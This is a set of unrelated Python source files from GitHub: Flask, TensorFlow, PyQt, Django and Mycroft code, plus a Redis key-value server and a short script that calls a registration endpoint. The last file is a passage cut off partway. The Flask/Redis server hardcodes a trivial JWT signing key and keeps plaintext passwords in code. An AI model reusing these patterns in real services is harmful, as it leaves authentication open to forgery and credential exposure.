code
| 0 |
github-code
|
6
|
16312489701
|
from flask import Blueprint, render_template, request, flash, redirect
shared_file = Blueprint('shared_file', __name__)
@shared_file.route('/')
def get__():
from models import File, User
files = File.query.filter(File.shared).all()
users = list(User.get_by(id_=file.creator_id) for file in files)
list_ = list((file.filename, user.username) for file, user in zip(files, users))
return render_template('shared_file.html', list=list_)
@shared_file.route('/download')
def get__download():
from models import User, File
try:
filename = request.args.get('filename')
assert filename, 'missing filename'
username = request.args.get('username')
assert username, 'missing username'
type_ = request.args.get('type')
assert type_, 'missing type'
assert type_ in ('encrypted', 'signature'), 'unknown type'
user = User.get_by(username=username)
return File.download_file(user, filename, type_)
except AssertionError as e:
message = e.args[0] if len(e.args) else str(e)
        flash('下载失败!' + message)  # '下载失败' means 'Download failed'
return redirect('/shared_file')
|
TheMasterOfMagic/ac
|
views/shared_file.py
|
shared_file.py
|
py
| 1,156 |
python
|
en
|
code
| 1 |
github-code
|
6
|
20844418825
|
import tensorflow as tf
def multiclass_non_max_suppression(
boxes, scores, score_threshold,
iou_threshold, max_boxes_per_class):
"""Multi-class version of non maximum suppression. It operates independently
for each class. Also it prunes boxes with score less than a provided
threshold prior to applying NMS.
Arguments:
boxes: a float tensor with shape [N, num_classes, 4].
scores: a float tensor with shape [N, num_classes].
score_threshold: a float number.
iou_threshold: a float number.
max_boxes_per_class: an integer,
maximum number of retained boxes per class.
Returns:
selected_boxes: a float tensor with shape [M, 4],
where 0 <= M <= max_boxes_per_class * num_classes.
selected_scores: a float tensor with shape [M].
        selected_classes: an int tensor with shape [M].
"""
boxes_list = tf.unstack(boxes, axis=1)
scores_list = tf.unstack(scores, axis=1)
selected_boxes, selected_scores, selected_classes = [], [], []
for i, (b, s) in enumerate(zip(boxes_list, scores_list)):
selected_indices = tf.image.non_max_suppression(
boxes=b, scores=s, max_output_size=max_boxes_per_class,
iou_threshold=iou_threshold, score_threshold=score_threshold,
)
selected_boxes += [tf.gather(b, selected_indices)]
selected_scores += [tf.gather(s, selected_indices)]
selected_classes += [i * tf.ones_like(selected_indices)]
selected_boxes = tf.concat(selected_boxes, axis=0)
selected_scores = tf.concat(selected_scores, axis=0)
selected_classes = tf.to_int32(tf.concat(selected_classes, axis=0))
return selected_boxes, selected_scores, selected_classes
def batch_multiclass_non_max_suppression(
boxes, scores, num_boxes_per_image,
score_threshold, iou_threshold,
max_boxes_per_class):
"""Same as multiclass_non_max_suppression but for a batch of images.
Arguments:
boxes: a float tensor with shape [N, num_classes, 4].
scores: a float tensor with shape [N, num_classes].
num_boxes_per_image: an int tensor with shape [batch_size],
where N = sum(num_boxes_per_image).
Returns:
boxes: a float tensor with shape [M, 4].
scores: a float tensor with shape [M].
classes: an int tensor with shape [M].
num_boxes_per_image: an int tensor with shape [batch_size].
"""
batch_size = num_boxes_per_image.shape[0].value
boxes_list = tf.split(boxes, num_or_size_splits=num_boxes_per_image, axis=0)
scores_list = tf.split(scores, num_or_size_splits=num_boxes_per_image, axis=0)
selected_boxes, selected_scores, selected_classes = [], [], []
num_selected_boxes_per_image = []
for i in range(batch_size):
b, s, c = multiclass_non_max_suppression(
boxes_list[i], scores_list[i],
score_threshold, iou_threshold,
max_boxes_per_class
)
n = tf.to_int32(tf.shape(b)[0])
selected_boxes.append(b)
selected_scores.append(s)
selected_classes.append(c)
num_selected_boxes_per_image.append(n)
boxes = tf.concat(selected_boxes, axis=0)
scores = tf.concat(selected_scores, axis=0)
classes = tf.concat(selected_classes, axis=0)
num_boxes_per_image = tf.stack(num_selected_boxes_per_image)
return boxes, scores, classes, num_boxes_per_image
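# Minimal usage sketch (shapes and threshold values below are illustrative assumptions):
#   boxes:  float tensor [N, num_classes, 4];  scores: float tensor [N, num_classes]
#   b, s, c = multiclass_non_max_suppression(
#       boxes, scores, score_threshold=0.05, iou_threshold=0.5, max_boxes_per_class=100)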
|
TropComplique/light-head-rcnn
|
detector/utils/nms.py
|
nms.py
|
py
| 3,483 |
python
|
en
|
code
| 23 |
github-code
|
6
|
74743637626
|
import re
from PyQt4 import QtGui
from PyQt4 import QtCore
from PyQt4.QtCore import Qt
from customeditor import CustomEditor
from camelot.view.art import Icon
import camelot.types
class VirtualAddressEditor(CustomEditor):
def __init__(self, parent=None, editable=True, address_type=None, **kwargs):
CustomEditor.__init__(self, parent)
self._address_type = address_type
self.layout = QtGui.QHBoxLayout()
self.layout.setMargin(0)
self.combo = QtGui.QComboBox()
self.combo.addItems(camelot.types.VirtualAddress.virtual_address_types)
self.combo.setEnabled(editable)
if address_type:
self.combo.setVisible(False)
self.layout.addWidget(self.combo)
self.editor = QtGui.QLineEdit()
self.editor.setEnabled(editable)
self.layout.addWidget(self.editor)
self.setFocusProxy(self.editor)
self.editable = editable
nullIcon = Icon('tango/16x16/apps/internet-mail.png').getQIcon()
self.label = QtGui.QToolButton()
self.label.setIcon(nullIcon)
self.label.setAutoFillBackground(False)
self.label.setAutoRaise(True)
self.label.setEnabled(False)
self.label.setToolButtonStyle(Qt.ToolButtonIconOnly)
self.layout.addWidget(self.label)
self.editor.editingFinished.connect(self.emit_editing_finished)
self.editor.textEdited.connect(self.editorValueChanged)
self.combo.currentIndexChanged.connect(self.comboIndexChanged)
self.setLayout(self.layout)
self.setAutoFillBackground(True)
self.checkValue(self.editor.text())
@QtCore.pyqtSlot()
def comboIndexChanged(self):
self.checkValue(self.editor.text())
self.emit_editing_finished()
def set_value(self, value):
value = CustomEditor.set_value(self, value)
if value:
self.editor.setText(value[1])
idx = camelot.types.VirtualAddress.virtual_address_types.index(self._address_type or value[0])
self.combo.setCurrentIndex(idx)
icon = Icon('tango/16x16/devices/printer.png').getQIcon()
# These icons don't exist any more in the new tango icon set
# if str(self.combo.currentText()) == 'phone':
# icon = Icon('tango/16x16/devices/phone.png').getQIcon()
if str(self.combo.currentText()) == 'fax':
icon = Icon('tango/16x16/devices/printer.png').getQIcon()
# if str(self.combo.currentText()) == 'mobile':
# icon = Icon('tango/16x16/devices/mobile.png').getQIcon()
# if str(self.combo.currentText()) == 'im':
# icon = Icon('tango/16x16/places/instant-messaging.png').getQIcon()
# if str(self.combo.currentText()) == 'pager':
# icon = Icon('tango/16x16/devices/pager.png').getQIcon()
if str(self.combo.currentText()) == 'email':
icon = Icon('tango/16x16/apps/internet-mail.png').getQIcon()
#self.label.setFocusPolicy(Qt.StrongFocus)
self.label.setAutoRaise(True)
#self.label.setAutoFillBackground(True)
self.label.setIcon(icon)
self.label.setEnabled(self.editable)
self.label.clicked.connect(
lambda:self.mailClick(self.editor.text())
)
else:
self.label.setIcon(icon)
#self.label.setAutoFillBackground(False)
self.label.setAutoRaise(True)
self.label.setEnabled(self.editable)
self.label.setToolButtonStyle(Qt.ToolButtonIconOnly)
# self.update()
# self.label.update()
# self.layout.update()
self.checkValue(value[1])
def get_value(self):
value = (unicode(self.combo.currentText()), unicode(self.editor.text()))
return CustomEditor.get_value(self) or value
def set_enabled(self, editable=True):
self.combo.setEnabled(editable)
self.editor.setEnabled(editable)
if not editable:
self.label.setEnabled(False)
else:
if self.combo.currentText() == 'email':
self.label.setEnabled(True)
def checkValue(self, text):
if self.combo.currentText() == 'email':
email = unicode(text)
mailCheck = re.compile('^\S+@\S+\.\S+$')
if not mailCheck.match(email):
palette = self.editor.palette()
palette.setColor(QtGui.QPalette.Active,
QtGui.QPalette.Base,
QtGui.QColor(255, 0, 0))
self.editor.setPalette(palette)
else:
palette = self.editor.palette()
palette.setColor(QtGui.QPalette.Active,
QtGui.QPalette.Base,
QtGui.QColor(255, 255, 255))
self.editor.setPalette(palette)
elif self.combo.currentText() == 'phone' \
or self.combo.currentText() == 'pager' \
or self.combo.currentText() == 'fax' \
or self.combo.currentText() == 'mobile':
number = unicode(text)
numberCheck = re.compile('^[0-9 ]+$')
if not numberCheck.match(number):
palette = self.editor.palette()
palette.setColor(QtGui.QPalette.Active,
QtGui.QPalette.Base,
QtGui.QColor(255, 0, 0))
self.editor.setPalette(palette)
else:
palette = self.editor.palette()
palette.setColor(QtGui.QPalette.Active,
QtGui.QPalette.Base,
QtGui.QColor(255, 255, 255))
self.editor.setPalette(palette)
else:
Check = re.compile('^.+$')
if not Check.match(unicode(text)):
palette = self.editor.palette()
palette.setColor(QtGui.QPalette.Active,
QtGui.QPalette.Base,
QtGui.QColor(255, 0, 0))
self.editor.setPalette(palette)
else:
palette = self.editor.palette()
palette.setColor(QtGui.QPalette.Active,
QtGui.QPalette.Base,
QtGui.QColor(255, 255, 255))
self.editor.setPalette(palette)
def editorValueChanged(self, text):
self.checkValue(text)
def mailClick(self, adress):
url = QtCore.QUrl()
url.setUrl('mailto:%s?subject=Subject'%str(adress))
QtGui.QDesktopServices.openUrl(url)
def emit_editing_finished(self):
self.value = []
self.value.append(str(self.combo.currentText()))
self.value.append(str(self.editor.text()))
self.set_value(self.value)
self.label.setFocus()
# emiting editingFinished without a value for the mechanism itself will lead to
# integrity errors
if self.value[1]:
self.editingFinished.emit()
def set_background_color(self, background_color):
if background_color:
palette = self.editor.palette()
palette.setColor(self.backgroundRole(), background_color)
self.editor.setPalette(palette)
else:
return False
|
kurtraschke/camelot
|
camelot/view/controls/editors/virtualaddresseditor.py
|
virtualaddresseditor.py
|
py
| 7,474 |
python
|
en
|
code
| 4 |
github-code
|
6
|
34084173801
|
from django.conf.urls.defaults import patterns, url
from django.template.defaultfilters import slugify
from rc.resources.views import ResourceItemListView
from rc.resources.apps.operations import models
def green_building_url(url_string, building_type, image_url=None,
image_alt=None, image_caption=None,
buildings_name=None, model=models.CampusGreenBuilding):
if not buildings_name:
buildings_name = ' '.join(building_type.split()[1:]).lower()
return url(url_string,
ResourceItemListView.as_view(
model=model,
queryset=model.objects.published().filter(
type__type=building_type).order_by(
'type', 'certification', 'organization__name'),
template_name='operations/campusgreenbuilding_list.html'),
name=slugify(building_type),
kwargs={'cert_order': dict(models.CampusGreenBuilding.LEED_LEVELS),
'title': building_type,
'image_url': image_url,
'image_alt': image_alt,
'image_caption': image_caption,
'buildings_name': buildings_name,
'member_only': True})
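# The green_building_url(...) calls near the end of urlpatterns below show this helper in use:
# it builds one published-CampusGreenBuilding list view per building type, using the slugified
# type as the URL name.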
urlpatterns = patterns('',
url(r'^campus-alternative-transportation-websites$',
ResourceItemListView.as_view(
model=models.TransportationWebsite,
queryset=models.TransportationWebsite.objects.published().order_by(
'organization__name')),
name='transportation-websites',
kwargs={'member_only': True, 'title': 'Campus Alternative Transportation Websites'}),
url(r'^bottled-water-elimination-and-reduction$',
ResourceItemListView.as_view(
model=models.BottledWaterBan,
queryset=models.BottledWaterBan.objects.published().order_by(
'type', 'organization__name')),
name='bottled-water-bans',
kwargs={'type_list': [ level[0] for level in
models.BottledWaterBan.BAN_TYPES ],
'type_dict': dict(models.BottledWaterBan.BAN_TYPES),
'title': 'Campus Bottled Water Bans and Reduction Campaigns',
'member_only': True}),
url(r'^campus-building-energy-dashboards$',
ResourceItemListView.as_view(
model=models.BuildingDashboard,
queryset=models.BuildingDashboard.objects.published().order_by(
'partner__name', 'organization__name')),
name='building-dashboards',
kwargs={'title': 'Campus Building Energy Dashboards',
'member_only': True}),
url(r'^biodiesel-campus-fleets$',
ResourceItemListView.as_view(
model=models.BiodieselFleet,
queryset=models.BiodieselFleet.objects.published().order_by(
'production', 'organization__country',
'organization__name')),
name='biodiesel-fleets',
kwargs={'member_only': True,
'production_types':
dict(models.BiodieselFleet.PRODUCTION_TYPE)}),
url(r'^campus-bicycle-plans$',
ResourceItemListView.as_view(
model=models.BicyclePlan,
queryset=models.BicyclePlan.objects.published().order_by(
'organization__name')),
name='bicycle-plans',
kwargs={'member_only': True}),
url(r'^campus-car-bans$',
ResourceItemListView.as_view(
model=models.CarBan,
queryset=models.CarBan.objects.published().order_by(
'-type', 'organization__name')),
name='car-bans',
kwargs={'ban_types': dict(models.CarBan.BAN_TYPES)}),
url(r'^campus-commuter-surveys$',
ResourceItemListView.as_view(
model=models.CommuterSurvey,
queryset=models.CommuterSurvey.objects.published().order_by(
'type', 'organization__name')),
name='commuter-surveys',
kwargs={'survey_types': dict(models.CommuterSurvey.SURVEY_TYPES),
'member_only': True}),
url(r'^campus-electric-vehicle-fleets$',
ResourceItemListView.as_view(
model=models.ElectricFleet,
queryset=models.ElectricFleet.objects.published().order_by(
'organization__country', 'organization__name')),
name='electric-fleets',
kwargs={'member_only': True}),
url(r'^campus-energy-plans$',
ResourceItemListView.as_view(
model=models.EnergyPlan,
queryset=models.EnergyPlan.objects.published().order_by(
'organization__name')),
name='energy-plans',
kwargs={'member_only': True}),
url(r'^campus-energy-websites$',
ResourceItemListView.as_view(
model=models.EnergyWebsite,
queryset=models.EnergyWebsite.objects.published().order_by(
'organization__name')),
name='energy-websites'),
url(r'^campus-global-warming-commitments$',
ResourceItemListView.as_view(
model=models.GlobalWarmingCommitment,
queryset=models.GlobalWarmingCommitment.objects.published().order_by(
'organization__name', 'date')),
kwargs={'member_only': True},
name='global-warming-commitments',
),
url(r'^campus-hybrid-vehicle-fleets$',
ResourceItemListView.as_view(
model=models.HybridFleet,
queryset=models.HybridFleet.objects.published().order_by(
'organization__country', 'organization__name')),
name='hybrid-fleets',
kwargs={'member_only': True}),
url(r'^campus-recycling-and-waste-minimization-websites$',
ResourceItemListView.as_view(
model=models.RecyclingWebsite,
queryset=models.RecyclingWebsite.objects.published().order_by(
'organization__name')),
name='recycling-websites',
kwargs={'title': 'Campus Recycling & Waste Minimization Websites',
'member_only': True}),
url(r'^campus-water-conservation-efforts$',
ResourceItemListView.as_view(
model=models.WaterConservationEffort,
queryset=models.WaterConservationEffort.objects.published().order_by(
'organization__country', 'organization__name')),
name='water-conservation-efforts',
kwargs={'member_only': True}),
url(r'^wind-power-campus-1$',
ResourceItemListView.as_view(
model=models.WindTurbine,
queryset=models.WindTurbine.objects.published().order_by(
'-size', 'organization__name')),
name='wind-turbines',
kwargs={'member_only': True,
'title': 'Wind Turbine Installations on Campus'}),
url(r'^carsharing-campus$',
ResourceItemListView.as_view(
model=models.CarShare,
queryset=models.CarShare.objects.published().order_by(
'partner__name', 'organization__name')),
name='car-shares',
kwargs={'member_only': True}),
url(r'^renewable-energy-research-centers$',
ResourceItemListView.as_view(
model=models.RenewableResearchCenter,
queryset=models.RenewableResearchCenter.objects.published().order_by(
'organization__name')),
name='renewable-research-centers',
kwargs={
'title': 'Renewable Energy Research Centers',
'member_only': True,
}),
url(r'^campus-installations-stationary-fuel-cells$',
ResourceItemListView.as_view(
model=models.FuelCell,
queryset=models.FuelCell.objects.published().order_by('-size',
'organization__name')),
name='fuel-cells',
kwargs={
'title': 'Campus Installations of Stationary Fuel Cells',
'member_only': True,
}),
url(r'^sustainable-dining-initiatives-campus$',
ResourceItemListView.as_view(
model=models.DiningInitiative,
queryset=models.DiningInitiative.objects.published().order_by(
'ownership', 'organization__name')),
name='dining-initiatives',
kwargs={'owners': dict(models.DiningInitiative.OWNERS),
'member_only': True}),
url(r'^campus-greenhouse-gas-emissions-inventories$',
ResourceItemListView.as_view(
model=models.GHGInventory,
queryset=models.GHGInventory.objects.published().order_by(
'methodology', 'organization__name')),
name='ghg-inventories',
kwargs={'methodology_types': dict(models.GHGInventory.METHODOLOGY_TYPES),
'member_only': False}),
url(r'^sustainable-landscaping-campus$',
ResourceItemListView.as_view(
model=models.SustainableLandscape,
queryset=models.SustainableLandscape.objects.published().order_by(
'organization__name')),
name='sustainable-landscapes',
kwargs={
'title': 'Sustainable Landscaping Initiatives on Campus',
'member_only': True,
}),
url(r'^links-related-sustainable-purchasing-campus$',
ResourceItemListView.as_view(
model=models.PurchasingLink,
queryset=models.PurchasingLink.objects.published().order_by(
'type', 'organization__name')),
name='purchasing-links',
kwargs={'type_list': dict(models.PurchasingLink.LINK_TYPES),
'title': 'Sustainable Purchasing Initiatives on Campus',
'member_only': True}),
url(r'^campus-universal-transit-passes$',
ResourceItemListView.as_view(
model=models.TransitPass,
queryset=models.TransitPass.objects.published().order_by(
'-type', 'organization__country',
'organization__name')),
name='transit-passes',
kwargs={
'type_list': dict(models.TransitPass.PASS_TYPES),
'member_only': True,
}),
green_building_url(
url_string=r'^athletic-recreation-centers-stadiums$',
building_type='Green Athletic Buildings',
image_url='http://www.aashe.org/files/univ_of_arizona_rec_center_0.jpg',
image_alt='Univ Arizona',
image_caption='University of Arizona Recreation Center'),
green_building_url(
url_string=r'^green-student-centers$',
building_type='Green Student Centers',
image_url='http://www.aashe.org/files/sju_mckeown_0.jpg',
image_alt='SJU McKeown',
image_caption='St. John\'s University McKeown Center',
),
green_building_url(
url_string=r'^green-libraries-campus$',
building_type='Green Libraries on Campus',
image_url='http://www.aashe.org/files/thompson_library_1.jpg',
image_alt='OSU Thompson Library',
image_caption='Ohio State University Thompson Library',
buildings_name='libraries',
),
green_building_url(
url_string=r'^green-residence-halls$',
building_type='Green Residence Halls',
image_url='http://www.aashe.org/files/ashdown_house_mit.jpg',
image_alt='MIT Ashdown House',
image_caption='MIT Ashdown House',
# Model is empty, dunno why (mt)
model=models.GreenResidenceHall,
),
green_building_url(
url_string=r'^green-science-buildings$',
building_type='Green Science Buildings',
image_url='http://www.aashe.org/files/brandeis.jpg',
image_alt='Brandeis University Shapiro Science Center',
image_caption='Brandeis University Shapiro Science Center',
),
)
|
AASHE/django-irc
|
rc/resources/apps/operations/urls.py
|
urls.py
|
py
| 12,244 |
python
|
en
|
code
| 0 |
github-code
|
6
|
35862928120
|
import json
import redis
from flask import Flask, request, Response, make_response
import base64
from jwt.api_jwt import PyJWT
app = Flask(__name__)
d = {'write': '1', 'read': '2', 'delete': '3'}
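# Each key in d doubles as a username and a role: "write" may PUT, "read" may GET,
# "delete" may DELETE; the corresponding value is that user's password.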
HOST = 'rediska'
Key = '12345'
@app.route('/auth/')
def requestic4():
user = request.authorization.username
password = request.authorization.password
if d.get(user) != None and d[str(user)] == password:
payload = {"role": str(user)}
jwt_Obj = PyJWT()
jwt_token = jwt_Obj.encode(payload=payload, key=Key)
rez = make_response(str(jwt_token, 'UTF-8'), 200)
rez.headers['Authorization'] = str(jwt_token, 'UTF-8')
return rez
else:
return make_response("invalid user or password" + str(user) + ' ' + str(password), 400)
@app.route('/<key>/', methods=['PUT'])
def requestic1(key):
key = int("{}".format(key))
data = json.loads(request.data)
Jwt1 = request.headers['Authorization']
message = data.get("message")
try:
jwt_Obj = PyJWT()
decode_token = jwt_Obj.decode(str(Jwt1), key=Key)
if decode_token['role'] == "write":
if key == None or message == None:
return Response(status=400)
else:
cache = redis.Redis(host=HOST, port=6379)
cache.ping()
if cache.exists(key):
cache.delete(key)
cache.set(key, json.dumps(message))
return make_response("changed", 200)
else:
cache.set(key, json.dumps(message))
return make_response({key: message}, 201)
else:
return make_response("invalid1 tiket", 400)
except Exception:
return make_response("invalid2 tiket", 400)
@app.route('/<key>/', methods=['GET'])
def requestic2(key):
key=int("{}".format(key))
Jwt1 = request.headers['Authorization']
try:
jwt_Obj = PyJWT()
decode_token = jwt_Obj.decode(str(Jwt1), key=Key)
if decode_token['role'] == "read":
cache = redis.Redis(host = HOST, port=6379)
cache.ping()
if cache.exists(key):
res = json.loads(cache.get(key))
return make_response({"message": res}, 200)
else:
return Response(status=400)
else:
return make_response("invalid1 tiket", 400)
except Exception:
return make_response("invalid2 tiket", 400)
@app.route('/<key>/', methods=['DELETE'])
def requestic3(key):
key=int("{}".format(key))
Jwt1 = request.headers['Authorization']
try:
jwt_Obj = PyJWT()
decode_token = jwt_Obj.decode(str(Jwt1), key=Key)
if decode_token['role'] == "delete":
cache = redis.Redis(host = HOST, port=6379)
cache.ping()
if key == None:
return Response(status = 400)
else:
if cache.exists(key):
res = json.loads(cache.get(key))
cache.delete(key)
return make_response({"message": res}, 204)
else:
return Response(status=404)
else:
return make_response("invalid1 tiket", 400)
except Exception:
return make_response("invalid2 tiket", 400)
if __name__ == '__main__':
app.run(host = '0.0.0.0')
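# Hypothetical usage sketch (Flask's default port 5000 is assumed; credentials come from the d dict above):
#   curl -u write:1 http://localhost:5000/auth/            -> returns a JWT for the "write" role
#   curl -X PUT -H "Authorization: <that JWT>" -d '{"message": "hello"}' http://localhost:5000/7/
#   a JWT obtained with read:2 can then GET http://localhost:5000/7/ to read the value back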
|
ZharkovMihail/server_with_jwt
|
server.py
|
server.py
|
py
| 2,843 |
python
|
en
|
code
| 0 |
github-code
|
6
|
43073911588
|
"""
Annualization factor
"""
def annualization_factor(period):
"""
    Return the annualization factor for the given period.
Parameters
---------
period: str [daily, weekly, monthly, yearly]
        defines the rebalancing period
Returns
-------
annualization_factor : float
        the annualization factor
"""
try:
factor = ANNUALIZATION_FACTORS[period]
except KeyError:
raise ValueError(
"Period应当为daily, weekly, monthly, yearly中的一种"
)
return factor
BDAYS_PER_YEAR = 244
BDAYS_PER_MONTH = 20
MONTHS_PER_YEAR = 12
WEEKS_PER_YEAR = 52
YEAR_PER_YEAR = 1
ANNUALIZATION_FACTORS = {
'daily': BDAYS_PER_YEAR,
'weekly': WEEKS_PER_YEAR,
'monthly': MONTHS_PER_YEAR,
'yearly': YEAR_PER_YEAR
}
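# Example: annualization_factor('daily') -> 244, the number of trading days per year assumed above.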
|
SkyBlueRW/PortAttribute
|
portattr/const/annualization.py
|
annualization.py
|
py
| 769 |
python
|
en
|
code
| 0 |
github-code
|
6
|
23113245409
|
#-*- coding: utf-8 -*-
#-----------------------------------------------------------------------#
# Author: Luis Enrique Rojas Desales #
#-----------------------------------------------------------------------#
# This code is released under the GPL license. #
#-----------------------------------------------------------------------#
'''
Descarga Masiva SAT
Luis E. Rojas Desales
'''
from Interfaz import ListaRFC
from PySide2.QtGui import QIcon
from PySide2.QtWidgets import QMainWindow
from PySide2 import QtCore
import os
import configparser
class ListaC(QMainWindow):
def __init__(self, parent):
self.parent = parent
super().__init__()
self.ui = ListaRFC.Ui_MainWindow()
self.ui.setupUi(self)
self.setWindowModality(QtCore.Qt.ApplicationModal)
self.setWindowIcon(QIcon('cfdi.ico'))
self.inicio()
def inicio(self):
contenido = os.listdir('C:/CFDIs/')
for i in range(len(contenido)):
self.ui.lista.addItem(contenido[i])
self.ui.lista.itemDoubleClicked.connect(self.onClicked)
self.ui.aceptar.clicked.connect(self.aceptar)
def onClicked(self, item):
#QMessageBox.information(self, "Info", item.text())
self.close()
configuracion = configparser.ConfigParser()
configuracion.read('C:/CFDIs/' + item.text() + '/datos.cfg')
self.parent.ui.lrfc.setText(configuracion['Contribuyente']['rfc'])
self.parent.ui.lrazon.setText(configuracion['Contribuyente']['razon'])
self.parent.cargar(configuracion['Contribuyente']['rfc'])
def aceptar(self):
item = self.ui.lista.currentItem()
self.close()
configuracion = configparser.ConfigParser()
configuracion.read('C:/CFDIs/' + item.text() + '/datos.cfg')
self.parent.ui.lrfc.setText(configuracion['Contribuyente']['rfc'])
self.parent.ui.lrazon.setText(configuracion['Contribuyente']['razon'])
self.parent.cargar(configuracion['Contribuyente']['rfc'])
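# inicio() lists the folders under C:/CFDIs/ so the user can pick an RFC; a double-click or the
# "aceptar" button reads that folder's datos.cfg and hands the RFC back to the parent window via cargar().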
|
ikiex/CFDIMasivo
|
CFDI/Controlador/lista.py
|
lista.py
|
py
| 2,079 |
python
|
es
|
code
| 3 |
github-code
|
6
|
3654388040
|
import re
import time
from threading import Lock
from mycroft.configuration import Configuration
from mycroft.metrics import report_timing, Stopwatch
from mycroft.tts import TTSFactory
from mycroft.util import create_signal, check_for_signal
from mycroft.util.log import LOG
from mycroft.messagebus.message import Message
from mycroft.tts.remote_tts import RemoteTTSTimeoutException
from mycroft.tts.mimic_tts import Mimic
bus = None # Mycroft messagebus connection
config = None
tts = None
tts_hash = None
lock = Lock()
mimic_fallback_obj = None
_last_stop_signal = 0
def _start_listener(message):
"""
Force Mycroft to start listening (as if 'Hey Mycroft' was spoken)
"""
create_signal('startListening')
def handle_speak(event):
"""
Handle "speak" message
"""
config = Configuration.get()
Configuration.init(bus)
global _last_stop_signal
# Get conversation ID
if event.context and 'ident' in event.context:
ident = event.context['ident']
else:
ident = 'unknown'
start = time.time() # Time of speech request
with lock:
stopwatch = Stopwatch()
stopwatch.start()
utterance = event.data['utterance']
if event.data.get('expect_response', False):
# When expect_response is requested, the listener will be restarted
# at the end of the next bit of spoken audio.
bus.once('recognizer_loop:audio_output_end', _start_listener)
# This is a bit of a hack for Picroft. The analog audio on a Pi blocks
# for 30 seconds fairly often, so we don't want to break on periods
# (decreasing the chance of encountering the block). But we will
# keep the split for non-Picroft installs since it give user feedback
# faster on longer phrases.
#
# TODO: Remove or make an option? This is really a hack, anyway,
# so we likely will want to get rid of this when not running on Mimic
if (config.get('enclosure', {}).get('platform') != "picroft" and
len(re.findall('<[^>]*>', utterance)) == 0):
# Remove any whitespace present after the period,
# if a character (only alpha) ends with a period
# ex: A. Lincoln -> A.Lincoln
# so that we don't split at the period
utterance = re.sub(r'\b([A-za-z][\.])(\s+)', r'\g<1>', utterance)
chunks = re.split(r'(?<!\w\.\w.)(?<![A-Z][a-z]\.)(?<=\.|\;|\?)\s',
utterance)
for chunk in chunks:
                # Check if something has aborted the speech
if (_last_stop_signal > start or
check_for_signal('buttonPress')):
# Clear any newly queued speech
tts.playback.clear()
break
try:
mute_and_speak(chunk, ident)
except KeyboardInterrupt:
raise
except Exception:
LOG.error('Error in mute_and_speak', exc_info=True)
else:
mute_and_speak(utterance, ident)
stopwatch.stop()
report_timing(ident, 'speech', stopwatch, {'utterance': utterance,
'tts': tts.__class__.__name__})
def mute_and_speak(utterance, ident):
"""
Mute mic and start speaking the utterance using selected tts backend.
Args:
utterance: The sentence to be spoken
ident: Ident tying the utterance to the source query
"""
global tts_hash
# update TTS object if configuration has changed
if tts_hash != hash(str(config.get('tts', ''))):
global tts
# Stop tts playback thread
tts.playback.stop()
tts.playback.join()
# Create new tts instance
tts = TTSFactory.create()
tts.init(bus)
tts_hash = hash(str(config.get('tts', '')))
LOG.info("Speak: " + utterance)
try:
tts.execute(utterance, ident)
except RemoteTTSTimeoutException as e:
LOG.error(e)
mimic_fallback_tts(utterance, ident)
except Exception as e:
LOG.error('TTS execution failed ({})'.format(repr(e)))
def mimic_fallback_tts(utterance, ident):
global mimic_fallback_obj
# fallback if connection is lost
config = Configuration.get()
tts_config = config.get('tts', {}).get("mimic", {})
lang = config.get("lang", "en-us")
if not mimic_fallback_obj:
mimic_fallback_obj = Mimic(lang, tts_config)
tts = mimic_fallback_obj
LOG.debug("Mimic fallback, utterance : " + str(utterance))
tts.init(bus)
tts.execute(utterance, ident)
def handle_stop(event):
"""
handle stop message
"""
global _last_stop_signal
if check_for_signal("isSpeaking", -1):
_last_stop_signal = time.time()
tts.playback.clear() # Clear here to get instant stop
bus.emit(Message("mycroft.stop.handled", {"by": "TTS"}))
def init(messagebus):
""" Start speech related handlers.
Arguments:
messagebus: Connection to the Mycroft messagebus
"""
global bus
global tts
global tts_hash
global config
bus = messagebus
Configuration.init(bus)
config = Configuration.get()
bus.on('mycroft.stop', handle_stop)
bus.on('mycroft.audio.speech.stop', handle_stop)
bus.on('speak', handle_speak)
bus.on('mycroft.mic.listen', _start_listener)
tts = TTSFactory.create()
tts.init(bus)
tts_hash = hash(str(config.get('tts', '')))  # same hash that mute_and_speak compares against
def shutdown():
if tts:
tts.playback.stop()
tts.playback.join()
if mimic_fallback_obj:
mimic_fallback_obj.playback.stop()
mimic_fallback_obj.playback.join()
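# --- Illustrative sketch (not part of the original module) -------------------
# Assuming a connected Mycroft messagebus client `client`, the handlers wired
# up in init() above would be exercised roughly like this; the payload keys
# mirror the ones read in handle_speak().
#
# init(client)
# client.emit(Message('speak',
#                     {'utterance': 'Hello world', 'expect_response': False},
#                     context={'ident': 'demo-123'}))
# client.emit(Message('mycroft.audio.speech.stop', {}))
# shutdown()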
|
injones/mycroft_ros
|
scripts/mycroft/audio/speech.py
|
speech.py
|
py
| 5,795 |
python
|
en
|
code
| 5 |
github-code
|
6
|
72435188028
|
import requests
import json
URL = "http://localhost:8000/auth/users/"
def post_data():
# data = {
# "emial":"[email protected]",
# "name":"AdityaRokade",
# "password":"djangoroot",
# "re_password":"djangoroot",
# "first_name":"adi",
# "last_name":"rokade"
# }
# registration payload for the /auth/users/ endpoint
data = {
'email': '[email protected]',
'name': 'AdityaRokade',
'password': 'djangoroot',
're_password': 'djangoroot',
'first_name': 'adi',
'last_name': 'rokade'
}
# print(type(data))
# print("myapp1")
# json_data = json.dumps(data)
# print("myapp2",json_data)
# print(type(json_data))
r = requests.post(url = URL, data = data)
data = r.json()
print(data)
post_data()
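# Robustness sketch (same djoser-style /auth/users/ endpoint as above): check
# the HTTP status before decoding, since a failed registration returns a
# non-2xx response whose body may not be the JSON we expect.
def post_data_checked(payload):
    r = requests.post(url=URL, data=payload)
    if r.ok:
        print(r.json())
    else:
        print("registration failed:", r.status_code, r.text)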
|
adityarokade/social_book
|
social_book/myapp.py
|
myapp.py
|
py
| 805 |
python
|
en
|
code
| 0 |
github-code
|
6
|
39129545830
|
from __future__ import absolute_import, division, print_function
import os
from subprocess import check_call
import logging
import importlib
import tempfile
import yaml
from datetime import datetime
import numpy as np
import dask
import xarray as xr
import cftime
import esmlab
import data_catalog
#-- settings (move to config.yml or similar)
USER = os.environ['USER']
dirout = f'/glade/scratch/{USER}/calcs'
if not os.path.exists(dirout):
os.makedirs(dirout)
tmpdir = f'{dirout}/work'
if not os.path.exists(tmpdir):
os.makedirs(tmpdir)
logging.basicConfig(level=logging.INFO)
#-------------------------------------------------------------------------------
#-- methods
#-------------------------------------------------------------------------------
def pop_calc_zonal_mean(file_in):
'''
compute zonal mean of POP field
in lieu of wrapping klindsay's zon_avg program so as to operate on
an `xarray` dataset: write to file, compute, read back.
'''
za = '/glade/u/home/klindsay/bin/za'
